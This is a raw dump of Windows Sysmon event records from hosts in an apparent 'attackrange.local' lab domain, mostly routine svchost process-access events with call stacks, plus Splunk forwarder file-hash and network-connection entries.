07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:11.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C802B6C275D4BED593CEA75AA9FC1D88,SHA256=BB737AA0DA7DB63FC51F0C5F47EA681C256B5DD5BF484A67429D400373B1317A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.991{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4EFD2514AFC3B92874763A8C664B8453,SHA256=1CDED4415F152EBC4CE3F8159416F692E141C43947BF503A78920B8A67C758C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.991{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB6861F91F85DEAECB76585ABF11C93B,SHA256=C1E05D16F0CED500D5C8768D8138E67E61AE903C55F1A103E83C1DA75A5C883E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:02.776{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51052-false10.0.1.12-8000- 23542300x80000000000000001049587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.137{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43351876DADBB18A5D4B1C10B3AC7A5A,SHA256=7E096B1A38111D28CA99385D56BEC1E8B79F4DAFED7E05864CE94AD953AA5A35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.104{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001049585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.104{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45216E8738DFB7DB1EA564FE1674BCF1,SHA256=A09C6BC49C8D9BC0E00BF15ED05DDEE1AD4B07045CEBA288752DDA71308E746D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.375{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.307{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.291{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.291{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 